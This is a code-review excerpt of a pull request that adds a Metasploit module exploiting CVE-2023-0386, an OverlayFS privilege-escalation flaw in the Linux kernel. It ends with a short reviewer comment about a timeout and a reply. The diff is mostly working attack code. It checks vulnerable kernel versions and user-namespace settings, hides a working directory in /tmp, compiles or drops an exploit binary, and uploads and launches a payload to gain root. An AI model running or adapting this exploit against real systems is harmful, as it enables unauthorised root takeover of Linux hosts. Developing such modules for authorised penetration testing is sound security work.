modules/exploits/linux/local/cve_2023_0386_overlayfs_priv_esc.rb

```diff
@@ -0,0 +1,336 @@
+          'SideEffects' => [ ARTIFACTS_ON_DISK ]
+        }
+      )
+    )
+    register_options([
+      OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']])
+    ])
+    register_advanced_options([
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ])
+  end
+
+  def check
+    unless kernel_arch.include?('x64')
+      return CheckCode::Safe("System architecture #{kernel_arch} is not supported")
+    end
+
+    kernel_version = Rex::Version.new(kernel_release.split('-').first)
+    if kernel_version < Rex::Version.new('5.11') ||
+       Rex::Version.new('5.15.91') <= kernel_version && kernel_version < Rex::Version.new('5.16') ||
+       Rex::Version.new('6.1.9') <= kernel_version
+      return CheckCode::Safe("Linux kernel version #{kernel_version} is not vulnerable")
+    end
+
+    unless kernel_config && kernel_config.include?('CONFIG_USER_NS=y')
+      return CheckCode::Safe('Kernel config does not include CONFIG_USER_NS=y')
+    end
+
+    vprint_good('Kernel config has CONFIG_USER_NS enabled')
+
+    unless userns_enabled?
+      return CheckCode::Safe('Unprivileged user namespaces are not permitted')
+    end
+
+    vprint_good('Unprivileged user namespaces are permitted')
+
+    CheckCode::Appears("Linux kernel version found: #{kernel_version}")
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def exploit
+    if !datastore['ForceExploit'] && is_root?
+      fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
+    end
+
+    unless writable?(base_dir)
+      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
+    end
+
+    # Upload exploit executable
+    exploit_dir = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
+    cmd_exec("mkdir -p #{exploit_dir}")
+    if live_compile? && command_exists?('xxd')
+      vprint_status('Live compiling exploit on system...')
+      upload_and_compile("#{exploit_dir}/shell", exploit_source('CVE-2023-0386', 'getshell.c'))
+      cmd_exec("cd #{exploit_dir} && xxd -i shell > shell.xxd")
+      write_file("#{exploit_dir}/cve-2023-0386.c", strip_comments(get_exploit("#{exploit_dir}/.#{rand_text_alphanumeric(5..10)}")))
+      cmd_exec("gcc -o #{exploit_dir}/cve-2023-0386 #{exploit_dir}/cve-2023-0386.c -D_FILE_OFFSET_BITS=64 -static -lfuse -ldl -pthread")
+      cmd_exec("chmod +x #{exploit_dir}/cve-2023-0386")
+    else
+      vprint_status('Dropping pre-compiled exploit on system...')
+      upload_and_chmodx("#{exploit_dir}/cve-2023-0386", exploit_data('CVE-2023-0386', 'cve-2023-0386'))
+    end
+    register_dir_for_cleanup(exploit_dir)
+
+    # Upload payload executable
+    payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"
+    upload_and_chmodx(payload_path, generate_payload_exe)
+    # register payload for automatic cleanup
+    register_file_for_cleanup(payload_path)
+
+    # Launch exploit
+    timeout = 30
```

Comment:
Should this maybe be user configurable?

Reply:
Thank you! See. https://github.com/rapid7/metasploit-framework/pull/19441/commits/dc8171130189ee4b57c6723258f59762b41d6d96